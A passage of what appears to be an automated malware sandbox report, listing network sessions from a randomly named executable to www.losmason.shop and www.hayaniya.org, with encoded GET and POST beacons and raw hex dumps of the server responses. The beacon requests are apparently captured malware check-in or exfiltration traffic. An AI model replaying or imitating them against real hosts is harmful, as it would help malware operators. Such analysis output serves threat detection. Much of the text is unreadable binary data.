MHJ0GXi=Ed4ppQsMn5Ty/hqoaQw8tLGkCOHLnboo7uPzy2/WWPq1c3bBLey+Z+lwjl08KRnC31fn1wzVUy4HhLKGqQEgvAdNjt5FVI/KGZ1T2ooi3CM7Cs788840U+bL0ygyRgnVLRehIp2rKVExgQ1TYuPzD3hVWPx6/xN+CzsPh/JUc+hpHQ1Cs/D2yQtSVxgeqG8Zfb5LQIWJ9PPpDKU8ULSB0FJ2mXssWR+5eO6Vd/LP4vaC4LESwDCjPYG9UPJQiEci5r0E68CWComK73+t9E+qyQN0gGFWBQo/NI3MO4+diTbYf8Wk9rVXYZF6qozqaPgj8xGqASqaTIsppoMIBQU++e/IOweSFd9PYfFSE2VMDS+dk5jCPqjHKdWmcbuU/mECGmKBv8ZmjqRFcKVnuBsajrhv7FVl9gHy36JBTIZ1ScTE1ReSCNDu8/iUdhSW2Da7Qoc7sU0dvY7KbKvHwYLN30/U05fNka4FGEHbBe80Co4seKAzpI0boNfnBNez973Tnn3ftDYxnEbOkgyrbMqBsmM+OQ1/vhZ7fF1Qq16sDCVLtsFDhZD6vZu0Z2tAT2B7Jrfoy8/DXqDpEzxetZ5a7jn/KhFeS36LJXVYq3YtMJ/4d5eeQeyz1y0ySc882299p1LtP5OK+WrfZ6yqPeINUJPhdrSb7DAzZFdMMIR9Lgh379csLJdQLL7ngNswOV0k0LMd3qiL3+BtIb3DHAfbCud5YzO42Bm9b2CH4lbAh+UwhRiWj3RV2i+9iK+wnFh/UqDKzV+rcpQqgk+3uClnrPaOI51+bxpy80MDy3eBs1EOodXSRokGARtckQzHvqkt5pVTMfKiYNq5n7mWKEOxdrZRwWr++XCz4YCJXM2VZtIRaLE60BtIlbuRzBBS08QfHiGS6d63f3ImqnbtC3RuCPhVwtaS16dap6pWC3O1aJjlFVs3Fdx5lzptv8H1cpqbjVVnS3zpHz6mdUebmZfPzPAIg3aH5xDe9SvXP9xT2q2v [TRUNCATED]
                                                            Jan 11, 2025 04:17:19.121052980 CET1236INHTTP/1.1 409 Conflict
                                                            Date: Sat, 11 Jan 2025 03:17:19 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 6119
                                                            Connection: close
                                                            X-Frame-Options: SAMEORIGIN
                                                            Referrer-Policy: same-origin
                                                            Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                            Vary: Accept-Encoding
                                                            Server: cloudflare
                                                            CF-RAY: 9001c0ca2bb64246-EWR
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 44 4e 53 20 72 65 73 6f 6c [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>DNS resolution error | www.losmason.shop | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/main.css" /><script>(function(){if(document.addEventListener&&window.XMLHttpRequest&&JSON&&
                                                            Jan 11, 2025 04:17:19.121128082 CET1236INData Raw: 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 29 7b 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 63 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 65 72 72 6f 72 2d 66 65 65 64 62 61 63 6b 2d 73 75
                                                            Data Ascii: JSON.stringify){var e=function(a){var c=document.getElementById("error-feedback-survey"),d=document.getElementById("error-feedback-success"),b=new XMLHttpRequest;a={event:"feedback clicked",properties:{errorCode:1001,helpful:a,version:1}};b.op
                                                            Jan 11, 2025 04:17:19.121144056 CET1236INData Raw: 70 74 2d 31 30 20 6c 67 3a 70 74 2d 36 20 6c 67 3a 70 78 2d 38 20 77 2d 32 34 30 20 6c 67 3a 77 2d 66 75 6c 6c 20 6d 62 2d 31 35 20 61 6e 74 69 61 6c 69 61 73 65 64 22 3e 0a 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 69 6e 6c 69
                                                            Data Ascii: pt-10 lg:pt-6 lg:px-8 w-240 lg:w-full mb-15 antialiased"> <h1 class="inline-block md:block mr-2 md:mb-2 font-light text-60 md:text-3xl text-black-dark leading-tight"> <span data-translate="error">Error</span> <sp
                                                            Jan 11, 2025 04:17:19.121289968 CET1236INData Raw: 65 6e 74 69 61 6c 20 63 61 75 73 65 73 20 6f 66 20 74 68 69 73 3a 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 6d 6c 2d 31 30 20 6d 74 2d 36 20 74 65 78 74 2d 31 35 20 74 65 78 74 2d 62 6c 61 63 6b 2d 64 61
                                                            Data Ascii: ential causes of this:</p> <ul class="ml-10 mt-6 text-15 text-black-dark antialiased leading-normal"> <li class="mb-4"><strong class="font-semibold">Most likely:</strong> if the owner just signed up for Cloudflare it
                                                            Jan 11, 2025 04:17:19.121305943 CET1236INData Raw: 20 54 68 61 6e 6b 20 79 6f 75 20 66 6f 72 20 79 6f 75 72 20 66 65 65 64 62 61 63 6b 21 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 66 6f 6f 74 65
                                                            Data Ascii: Thank you for your feedback! </div></div> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <s
                                                            Jan 11, 2025 04:17:19.121320963 CET353INData Raw: 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76 61
                                                            Data Ascii: st.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=document;document.addEventListener&&a.addEventListener("DOMContentLoaded",d)})();</script></div>... /.error-footer --> </div>... /#cf-error-details


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            8192.168.2.749985104.18.73.116806896C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 04:17:21.220016003 CET553OUTGET /s15n/?nHI4y=ULkH023p-2&MHJ0GXi=JfQJqlQL4YuujxfZFicS9Y3zSvzh5uc29LPY+3nQdNuELRDWQb2uefNArAI9Jzm+wUv6iBr2b0gwhreB6wQHyT0LsuYRSsPCWoh575Uq8xJMJajdjvw7bNvPz2QoSF69NC7qAb+tKFkF HTTP/1.1
                                                            Host: www.losmason.shop
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-us
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                            Jan 11, 2025 04:17:21.661411047 CET406INHTTP/1.1 409 Conflict
                                                            Date: Sat, 11 Jan 2025 03:17:21 GMT
                                                            Content-Type: text/plain; charset=UTF-8
                                                            Content-Length: 16
                                                            Connection: close
                                                            X-Frame-Options: SAMEORIGIN
                                                            Referrer-Policy: same-origin
                                                            Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 9001c0da0e531902-EWR
                                                            Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 30 31
                                                            Data Ascii: error code: 1001


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            9192.168.2.749986192.185.147.100806896C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 04:17:27.017071962 CET808OUTPOST /yf1h/ HTTP/1.1
                                                            Host: www.hayaniya.org
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-us
                                                            Accept-Encoding: gzip, deflate
                                                            Connection: close
                                                            Content-Length: 220
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Origin: http://www.hayaniya.org
                                                            Referer: http://www.hayaniya.org/yf1h/
                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                            Data Raw: 4d 48 4a 30 47 58 69 3d 56 58 42 6f 37 4d 76 38 36 77 2f 78 72 68 67 6f 58 36 71 57 44 53 61 68 6a 4c 34 76 69 41 5a 57 73 63 2b 48 48 34 41 6b 73 6b 36 55 66 79 67 33 4c 61 30 49 41 31 49 6d 53 54 56 6a 4e 4e 2b 31 4d 75 4c 69 6d 53 44 64 77 65 69 6b 67 43 2b 37 53 61 2f 61 73 4e 71 4d 4b 44 47 47 4e 44 76 59 46 6f 44 6c 43 70 4f 61 7a 2f 58 6b 6e 30 2b 38 62 4d 59 7a 33 46 76 67 6e 72 46 33 43 59 36 55 4a 56 74 4e 30 77 2f 32 6a 55 4f 7a 6d 75 73 4e 7a 76 34 30 54 78 46 45 63 79 76 65 31 5a 6e 65 76 49 4c 5a 76 75 47 41 62 52 57 31 59 43 52 45 77 68 2b 49 46 79 31 56 67 76 37 72 79 4a 76 72 75 4a 2f 64 4f 73 31 41 4a 46 51 47 73 4b 4d 56 66 41 3d 3d
                                                            Data Ascii: MHJ0GXi=VXBo7Mv86w/xrhgoX6qWDSahjL4viAZWsc+HH4Aksk6Ufyg3La0IA1ImSTVjNN+1MuLimSDdweikgC+7Sa/asNqMKDGGNDvYFoDlCpOaz/Xkn0+8bMYz3FvgnrF3CY6UJVtN0w/2jUOzmusNzv40TxFEcyve1ZnevILZvuGAbRW1YCREwh+IFy1Vgv7ryJvruJ/dOs1AJFQGsKMVfA==
                                                            Jan 11, 2025 04:17:28.228260040 CET1236INHTTP/1.1 404 Not Found
                                                            Date: Sat, 11 Jan 2025 03:17:27 GMT
                                                            Server: Apache
                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                            Link: <https://hayaniya.org/wp-json/>; rel="https://api.w.org/"
                                                            Upgrade: h2,h2c
                                                            Connection: Upgrade, close
                                                            Vary: Accept-Encoding
                                                            Content-Encoding: gzip
                                                            Transfer-Encoding: chunked
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 e4 b2 eb 92 dc c6 95 2e fa 9b fd 14 10 14 24 bb ed ce 42 dd 2f cd aa f6 9e b1 e5 73 bc c3 de 72 58 9a f0 9e 90 74 7a 27 80 04 90 ea 44 26 94 48 74 75 89 d3 3f 24 91 34 87 6f 31 e1 b0 5b e4 11 ad e1 a6 ad 08 9e 27 41 bd cd 59 40 02 55 a8 2a 54 5f c8 6e 1d 8f 0f a5 46 ad 5c f7 ef 5b df f8 bd 5f 7c f8 f3 8f ff f5 b7 1f 18 81 0a d9 e1 ce 38 fb 31 5c 2a 27 a6 54 cc 34 18 e6 fe c4 c4 d2 cc 42 04 bb 87 3b 77 c6 21 51 d8 70 02 2c 63 a2 26 e6 bf 7c fc 4b 34 34 0d 6b 11 e1 38 24 13 f3 84 92 69 24 a4 32 0d 47 70 45 38 64 4e a9 ab 82 89 4b 4e a8 43 50 fe d8 37 28 a7 8a 62 86 62 07 33 32 69 15 7d 18 e5 c7 86 24 6c 62 46 52 78 94 11 d3 08 24 f1 26 66 a0 54 74 60 59 7e 18 f9 0d 21 7d eb d4 e3 56 ab a6 8a 72 df c6 ce f1 5a 59 80 67 98 d3 19 d6 a5 21 93 91 d3 88 82 a8 28 57 54 31 72 98 9e cf 1f a5 7f 9b 7f 95 be 4c 9f 1b e9 ff 33 7f 96 be 32 e6 8f e7 4f d3 ef e0 ef fb f4 79 c3 b8 f7 fe b0 dd 6a 3d 30 f2 cc ef e6 8f d3 37 90 f4 5c 3f 5f a4 6f e0 f7 e9 fc c9 d2 75 9e be [TRUNCATED]
                                                            Data Ascii: 1faa.$B/srXtz'D&Htu?$4o1['AY@U*T_nF\[_|81\*'T4B;w!Qp,c&|K44k8$i$2GpE8dNKNCP7(bb32i}$lbFRx$&fTt`Y~!}VrZYg!(WT1rL32Oyj=07\?_ouN_Yo<:sl;Ka_w?'($azX~/IK0=vg=aS(W:(K;0:f3:5ZllU<rU"cTDQ+*%peTL(No:uyxw`kp#TW:RihP|N?"JQxh8&"yPVSh.V^5}:hj&9UP~PwtCHC&nU>a<y@)o|I1h;O3>hlx~q'FO;v>{x!}.{,8"!$VW4.'SxqYB>v$GJH+@+GF$\z
                                                            Jan 11, 2025 04:17:28.228353024 CET1236INData Raw: b3 5d b5 b7 77 06 44 38 41 36 ee ec 6c 31 3e da 85 19 d9 6a a4 e1 00 54 f9 3b e2 a8 dd e6 7e 73 1f de 98 9f 60 b8 03 75 55 b0 7c 06 84 fa 81 da 03 07 a0 66 1f c3 1d 77 15 a4 37 f7 1e 68 00 d9 96 ff 42 b9 ea b4 ff 49 4a 3c db 25 0d 1f 76 ca 8e 08
                                                            Data Ascii: ]wD8A6l1>jT;~s`uU|fw7hBIJ<%vn/'wmH @"H&D}v$8)4P1Ea4q4H4i7.|x=4{%mg[mzbwnRIwM:AnW^&5$J
                                                            Jan 11, 2025 04:17:28.228367090 CET1236INData Raw: 33 cc e9 0c a4 2e 7d 6b 1a 21 00 a2 60 b6 15 b1 c4 a7 3c b6 02 60 82 48 e4 09 01 3a 47 84 91 6c 33 21 2d ca 1d ab ec 0d 5d 2d 4f e6 85 6e 03 1e 3f 03 32 27 ad 46 bf d1 6d dd 37 42 e2 52 3c b9 0f 5c de 37 2c 58 37 5f 24 5f 0f a6 e5 b0 f4 6e 31 a2
                                                            Data Ascii: 3.}k!`<`H:Gl3!-]-On?2'Fm7BR<\7,X7_$_n1wvPRFfF;w4x!1W jK\NQ`6hp-`UPl4aBQ3!5=2R$*f2d]( f9F]Apa$Zg
                                                            Jan 11, 2025 04:17:28.228388071 CET1236INData Raw: 7f 23 f8 83 43 e2 dd e6 be 51 fc df 68 af 5f b1 ac 76 09 89 00 09 f0 a9 3f bd 66 4d 75 77 5b 35 fc ca 68 39 b9 ae 76 eb 64 91 a8 4c 95 ee 6a 39 ea 94 3d da bd de be b1 fc b4 f6 f6 17 89 ab 33 5a db 26 38 92 c6 17 6e 07 95 67 07 d3 80 48 b2 db a0
                                                            Data Ascii: #CQh_v?fMuw[5h9vdLj9=3Z&8ngH1kK!>2_Rw5X}`dg2}`F}"a|`8+"7C?7\z0 qAZi97+!61rKBtAIH~YYFw^R8rwU
                                                            Jan 11, 2025 04:17:28.228399992 CET1236INData Raw: 6d 16 1b b5 06 ed de 68 34 1c f6 bb 6f b9 95 14 ef 42 5f 56 7f 55 f5 75 1a 9d b7 db d1 67 c2 c6 ec 9d 99 d3 6d 36 99 bb 9e e6 56 ef 39 6c de cc 41 87 cd ea 5e c3 41 ab d7 ed b4 df 61 2f 68 72 33 8b 41 a3 f5 cd 5a ad d1 75 36 0b 08 63 02 2d f7 bb
                                                            Data Ascii: mh4oB_VUugm6V9lA^Aa/hr3AZu6c-Z*Zk`je|}}D"OEnv/y00Fb-5thpDg)MXbzOfn3={:O7t+^U<xgPs31{7;.#g
                                                            Jan 11, 2025 04:17:28.228411913 CET1236INData Raw: d7 85 bf 1e fc f5 4b 3e 97 ba 3d 30 1c 4c a5 c8 a7 d8 c2 9d 5d 9c b1 d3 c8 09 e1 2a 46 58 12 6c 60 60 29 3b 1c 80 e7 0a dc 97 2e a7 09 01 8e 9a 6e 93 e4 1d ef dc 19 5b b1 9a 31 72 98 9b 01 c1 ee e1 ce ce 38 df c5 61 38 8e 27 66 a6 15 22 a5 90 dd
                                                            Data Ascii: K>=0L]*FXl``);.n[1r8a8'f"fFIb%B/x(!27= 0#0c-8 DmKp^zKONYxFLMXXeOp;""saje@(>HB;b~3{ERD$
                                                            Jan 11, 2025 04:17:28.228425026 CET776INData Raw: 53 fd bb bf 51 d1 6d 56 7c 71 e1 fc e4 b3 b3 8a f7 48 df ea b6 46 e4 04 be 13 86 56 ff 72 0c 0a db 8c a8 b7 1e a1 7f 36 a2 17 a0 f9 ff 60 e2 3b de e9 ca 13 b5 76 8f 40 95 2a f8 71 a7 fd 68 a4 ae 0c fd b1 78 75 98 88 c9 d1 e2 9e ef 38 b0 dd bc fe
                                                            Data Ascii: SQmV|qHFVr6`;v@*qhxu8NiXa:RL#(&X:oS7v00,Z ]a,=!2}5JEmH`vs:!}4BNLs*GGIMi\b(eD;$%rb/
                                                            Jan 11, 2025 04:17:28.228437901 CET1236INData Raw: 4a 44 9b 59 85 b5 e9 41 5e c7 1b f4 bc aa 64 03 ea ba c0 45 28 6c ca 40 aa 2e 56 18 51 17 60 eb cc c2 53 e4 1f a9 59 44 26 a6 1e 58 84 62 a2 14 e5 3e ec fd f0 de 17 89 50 0f 6c ec 1c fb 52 24 dc 3d 5a 9a 3a 74 a0 7f 72 9c d4 d1 8f 33 7d ad 7a 02
                                                            Data Ascii: JDYA^dE(l@.VQ`SYD&Xb>PlR$=Z:tr3}zQHDv=AI737p ;QJqEZtM"4\)"Q|}n3c-(dW184@obJEex9u(wG_'Y[
                                                            Jan 11, 2025 04:17:28.228610992 CET1236INData Raw: c2 df b3 db a4 af db b9 82 fe aa a0 17 9a f2 96 40 ed 1a 12 b5 0a fb f9 b7 55 49 6d 6a fb 12 66 00 3f 90 f1 3d 60 7f a5 c9 78 31 7f 32 ff 0a 9e ff 39 7f b6 24 63 6c 25 2c fb e6 f6 15 78 71 92 58 89 70 93 94 0d 7f 80 63 e4 04 94 b9 92 f0 8a bb 3b
                                                            Data Ascii: @UImjf?=`x129$cl%,xqXpc;VzB>u0w!5%tgG>T$w!Jb@^[~u7eYdv)<s-?|)&e~J;$JbVhl=&c"[=`%Tu`/_W
                                                            Jan 11, 2025 04:17:28.228625059 CET1236INData Raw: b9 e7 bb f9 a3 f4 f5 ad 91 d3 ed 77 af c4 4d 0d ba 4d 49 e8 24 af f4 2f 98 bb a6 24 34 e4 1c 7f fa a7 f4 fb f4 1c 28 79 7e 8b 0c 0c ae c4 40 bb 02 a8 00 a7 19 d0 8a e8 56 24 84 35 27 e8 c7 66 ee 6b 20 0a c8 32 d2 17 e9 5f 41 4f cf e6 8f 8c 1f 9b
                                                            Data Ascii: wMMI$/$4(y~@V$5'fk 2_AOvo0N@Qo6q<f"fM7gs|3<nnRmPJjSj&^ij^-[}$V"h9e$O]}"
                                                            Jan 11, 2025 04:17:28.233323097 CET691INData Raw: b2 83 12 be cf 48 6d c8 4e a4 bf 52 a5 91 6e 38 16 25 15 4a 8b a5 6b 29 d5 55 db d4 eb 25 8c 1d 41 8a 0a 56 85 ab 91 ae c8 95 e1 99 48 d4 4a 9a 2b 45 e4 8a 29 5f c9 8b 13 3b a7 84 82 20 8b ec 62 d8 09 66 09 59 69 70 8f a9 07 b4 38 cf a7 c5 46 38
                                                            Data Ascii: HmNRn8%Jk)U%AVHJ+E)_; bfYip8F86<yO-+Q[b9[i=b_gE>J&H+x7\B[+L9LCD)MCarNi`I1b&lbj<@N# cu]'bF$I`EImu!n6d


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            10192.168.2.749987192.185.147.100806896C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 04:17:29.577096939 CET828OUTPOST /yf1h/ HTTP/1.1
                                                            Host: www.hayaniya.org
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-us
                                                            Accept-Encoding: gzip, deflate
                                                            Connection: close
                                                            Content-Length: 240
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Origin: http://www.hayaniya.org
                                                            Referer: http://www.hayaniya.org/yf1h/
                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                            Data Raw: 4d 48 4a 30 47 58 69 3d 56 58 42 6f 37 4d 76 38 36 77 2f 78 71 41 51 6f 45 4a 43 57 42 79 61 75 39 62 34 76 74 67 5a 53 73 63 79 48 48 39 77 53 76 52 53 55 66 54 51 33 4d 59 4d 49 4e 56 49 6d 47 44 56 69 44 74 2b 41 4d 75 47 64 6d 54 2f 64 77 65 6d 6b 67 48 61 37 54 70 6e 5a 73 64 71 4f 4c 7a 47 45 54 7a 76 59 46 6f 44 6c 43 70 79 38 7a 2f 50 6b 6b 47 71 38 5a 75 38 77 30 46 76 6a 6b 72 46 33 56 6f 36 51 4a 56 74 2f 30 78 69 74 6a 53 4b 7a 6d 73 6b 4e 32 75 34 33 45 68 46 4f 59 79 75 75 6c 5a 7a 56 6d 6f 6e 32 75 49 4f 44 58 47 53 39 64 30 51 6d 71 44 79 6b 62 6a 4e 75 6b 74 66 64 6c 76 79 65 73 49 37 46 44 4f 42 68 57 79 31 73 68 59 74 52 4a 39 31 39 32 57 34 6f 75 4d 35 70 74 4a 59 58 46 54 39 72 50 73 41 3d
                                                            Data Ascii: MHJ0GXi=VXBo7Mv86w/xqAQoEJCWByau9b4vtgZSscyHH9wSvRSUfTQ3MYMINVImGDViDt+AMuGdmT/dwemkgHa7TpnZsdqOLzGETzvYFoDlCpy8z/PkkGq8Zu8w0FvjkrF3Vo6QJVt/0xitjSKzmskN2u43EhFOYyuulZzVmon2uIODXGS9d0QmqDykbjNuktfdlvyesI7FDOBhWy1shYtRJ9192W4ouM5ptJYXFT9rPsA=
                                                            Jan 11, 2025 04:17:30.351012945 CET1236INHTTP/1.1 404 Not Found
                                                            Date: Sat, 11 Jan 2025 03:17:29 GMT
                                                            Server: Apache
                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                            Link: <https://hayaniya.org/wp-json/>; rel="https://api.w.org/"
                                                            Upgrade: h2,h2c
                                                            Connection: Upgrade, close
                                                            Vary: Accept-Encoding
                                                            Content-Encoding: gzip
                                                            Transfer-Encoding: chunked
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 e4 b2 eb 92 dc c6 95 2e fa 9b fd 14 10 14 24 bb ed ce 42 dd 2f cd aa f6 9e b1 e5 73 bc c3 de 72 58 9a f0 9e 90 74 7a 27 80 04 90 ea 44 26 94 48 74 75 89 d3 3f 24 91 34 87 6f 31 e1 b0 5b e4 11 ad e1 a6 ad 08 9e 27 41 bd cd 59 40 02 55 a8 2a 54 5f c8 6e 1d 8f 0f a5 46 ad 5c f7 ef 5b df f8 bd 5f 7c f8 f3 8f ff f5 b7 1f 18 81 0a d9 e1 ce 38 fb 31 5c 2a 27 a6 54 cc 34 18 e6 fe c4 c4 d2 cc 42 04 bb 87 3b 77 c6 21 51 d8 70 02 2c 63 a2 26 e6 bf 7c fc 4b 34 34 0d 6b 11 e1 38 24 13 f3 84 92 69 24 a4 32 0d 47 70 45 38 64 4e a9 ab 82 89 4b 4e a8 43 50 fe d8 37 28 a7 8a 62 86 62 07 33 32 69 15 7d 18 e5 c7 86 24 6c 62 46 52 78 94 11 d3 08 24 f1 26 66 a0 54 74 60 59 7e 18 f9 0d 21 7d eb d4 e3 56 ab a6 8a 72 df c6 ce f1 5a 59 80 67 98 d3 19 d6 a5 21 93 91 d3 88 82 a8 28 57 54 31 72 98 9e cf 1f a5 7f 9b 7f 95 be 4c 9f 1b e9 ff 33 7f 96 be 32 e6 8f e7 4f d3 ef e0 ef fb f4 79 c3 b8 f7 fe b0 dd 6a 3d 30 f2 cc ef e6 8f d3 37 90 f4 5c 3f 5f a4 6f e0 f7 e9 fc c9 d2 75 9e be [TRUNCATED]
                                                            Data Ascii: 1faa.$B/srXtz'D&Htu?$4o1['AY@U*T_nF\[_|81\*'T4B;w!Qp,c&|K44k8$i$2GpE8dNKNCP7(bb32i}$lbFRx$&fTt`Y~!}VrZYg!(WT1rL32Oyj=07\?_ouN_Yo<:sl;Ka_w?'($azX~/IK0=vg=aS(W:(K;0:f3:5ZllU<rU"cTDQ+*%peTL(No:uyxw`kp#TW:RihP|N?"JQxh8&"yPVSh.V^5}:hj&9UP~PwtCHC&nU>a<y@)o|I1h;O3>hlx~q'FO;v>{x!}.{,8"!$VW4.'SxqYB>v$GJH+@+GF$\z
                                                            Jan 11, 2025 04:17:30.351048946 CET1236INData Raw: b3 5d b5 b7 77 06 44 38 41 36 ee ec 6c 31 3e da 85 19 d9 6a a4 e1 00 54 f9 3b e2 a8 dd e6 7e 73 1f de 98 9f 60 b8 03 75 55 b0 7c 06 84 fa 81 da 03 07 a0 66 1f c3 1d 77 15 a4 37 f7 1e 68 00 d9 96 ff 42 b9 ea b4 ff 49 4a 3c db 25 0d 1f 76 ca 8e 08
                                                            Data Ascii: ]wD8A6l1>jT;~s`uU|fw7hBIJ<%vn/'wmH @"H&D}v$8)4P1Ea4q4H4i7.|x=4{%mg[mzbwnRIwM:AnW^&5$J
                                                            Jan 11, 2025 04:17:30.351058960 CET448INData Raw: 33 cc e9 0c a4 2e 7d 6b 1a 21 00 a2 60 b6 15 b1 c4 a7 3c b6 02 60 82 48 e4 09 01 3a 47 84 91 6c 33 21 2d ca 1d ab ec 0d 5d 2d 4f e6 85 6e 03 1e 3f 03 32 27 ad 46 bf d1 6d dd 37 42 e2 52 3c b9 0f 5c de 37 2c 58 37 5f 24 5f 0f a6 e5 b0 f4 6e 31 a2
                                                            Data Ascii: 3.}k!`<`H:Gl3!-]-On?2'Fm7BR<\7,X7_$_n1wvPRFfF;w4x!1W jK\NQ`6hp-`UPl4aBQ3!5=2R$*f2d]( f9F]Apa$Zg
                                                            Jan 11, 2025 04:17:30.351129055 CET1236INData Raw: 56 39 ab 65 d6 67 c2 06 7d d7 51 7a 20 85 50 0f 11 82 05 50 24 49 4c 14 42 38 8e 88 a3 50 de 16 a1 f8 8b 04 4b 72 60 b4 1e 5c 94 d5 45 9d 03 a3 6b 75 2e 4c ea a0 ee 81 d1 b1 ba 97 24 b5 b3 a4 f6 85 49 ed 6c 5c fb 92 71 ad 3e 1a c1 de 7d 6b 74 61
                                                            Data Ascii: V9eg}Qz PP$ILB8PKr`\Eku.L$Il\q>}kta\#8xqfCbB Y_HTKDxzB]$y&mRrEzhDf%9+>]]Jz6Rm?$ns.]nG&:;J
